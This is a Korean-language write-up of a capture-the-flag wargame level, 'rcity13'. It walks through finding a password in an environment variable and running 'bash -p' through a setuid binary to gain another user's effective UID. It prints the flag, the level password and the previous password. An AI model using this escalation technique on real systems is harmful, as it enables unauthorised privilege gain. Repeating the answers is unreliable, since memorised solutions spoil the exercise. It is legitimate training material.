rcity13 Write-Up

 

 

 

풀이

 

rcity13@35e08a7255bf:~$ ls -al
total 48
drwxr-xr-x 1 root    root     4096 Mar  6 08:04 .
drwxr-xr-x 1 root    root     4096 Mar  6 08:03 ..
-rw-r--r-- 1 root    root      220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 root    root     3817 Mar  6 08:04 .bashrc
-rw-r--r-- 1 root    root      807 Jan  6  2022 .profile
-r-sr-x--- 1 rcity14 rcity13 16448 Mar  6 08:04 rcity13-binary
rcity13@35e08a7255bf:~$ file rcity13-binary 
rcity13-binary: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=949bfe04fad71f1663a147270f432b92da661d0d, for GNU/Linux 3.2.0, not stripped

 

rcity13-binary를 분석해보니 setuid 설정이 되어있는 것을 확인 할 수 있다 

 

rcity13@35e08a7255bf:~$ ./rcity13-binary 
[*] Usage: ./rcity13-binary <password> <command>
rcity13@35e08a7255bf:~$ ./rcity13-binary f2L9x6R5gH3q8C4s7Z0 ls
[*] Incorrect password. Exiting...

 

그래서 실행을 시켜보니 <password> <command> 형식으로 사용을 해라. 라고 나와서 rcity13 비밀번호를 치니 비밀번호가 맞지 않는다고 한다 문제를 보니 필요한 비밀번호는 해당 유저의 "환경"을 잘 살펴보라고 나온다 그렇다면 환경 변수 인가??

 

rcity13@35e08a7255bf:~$ export
declare -x HOME="/home/rcity13"
declare -x LANG="C.UTF-8"
declare -x LESSCLOSE="/usr/bin/lesspipe %s %s"
declare -x LESSOPEN="| /usr/bin/lesspipe %s"
declare -x LOGNAME="rcity13"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:"
declare -x MOTD_SHOWN="pam"
declare -x OLDPWD
declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin"
declare -x PWD="/home/rcity13"
declare -x README="research-setuid-its-important"
declare -x SHELL="/bin/bash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="203.229.62.101 61001 22"
declare -x SSH_CONNECTION="203.229.62.101 61001 172.17.0.2 22"
declare -x SSH_TTY="/dev/pts/2"
declare -x TERM="xterm-256color"
declare -x USER="rcity13"

 

뭔가 요상적은게 하나 있다면.. README..? 저기에 적혀있는 걸로 패스워드를 한번 입력해봐야겠다

 

rcity13@35e08a7255bf:~$ echo $README
research-setuid-its-important
rcity13@35e08a7255bf:~$ ./rcity13-binary research-setuid-its-important "/bin/bash"
bash-5.1$ ls
rcity13-binary
bash-5.1$ ls -al
total 48
drwxr-xr-x 1 root    root     4096 Mar  6 08:04 .
drwxr-xr-x 1 root    root     4096 Mar  6 08:03 ..
-rw-r--r-- 1 root    root      220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 root    root     3817 Mar  6 08:04 .bashrc
-rw-r--r-- 1 root    root      807 Jan  6  2022 .profile
-r-sr-x--- 1 rcity14 rcity13 16448 Mar  6 08:04 rcity13-binary
bash-5.1$ id
uid=1013(rcity13) gid=1013(rcity13) groups=1013(rcity13)
bash-5.1$

 

 

바이너리가 잘 실행되긴햇는데 뭔가 아쉽다. setuid가 설정되어있으면 euid가 있어야하는 걸로 아는데 없기 때문이다

 

권한 상승을 하기 위해서  -p 옵션을 사용

-p 옵션 privileges mode를 의미하며, 이 옵션은 bash를 root 권한으로 실행하여 특정 작업을 수행 할 때 사용된다

보통 보안과 관련된 작업를 수행할 때 사용되고, 루트권한이 필요할 때 사용 될 수 있다고 한다.

 

rcity13@35e08a7255bf:~$ ./rcity13-binary research-setuid-its-important "/bin/bash -p"
bash-5.1$ pwd
/home/rcity13
bash-5.1$ cd ..
bash-5.1$ cd rcity14
bash-5.1$ pwd
/home/rcity14
bash-5.1$ ls
rcity13-flag.txt
bash-5.1$ cat rcity13-flag.txt 
p4Q7d3J2mS6w5H0r8G1bash-5.1$ id
uid=1013(rcity13) gid=1013(rcity13) euid=1014(rcity14) groups=1013(rcity13)
bash-5.1$

 

flag 획득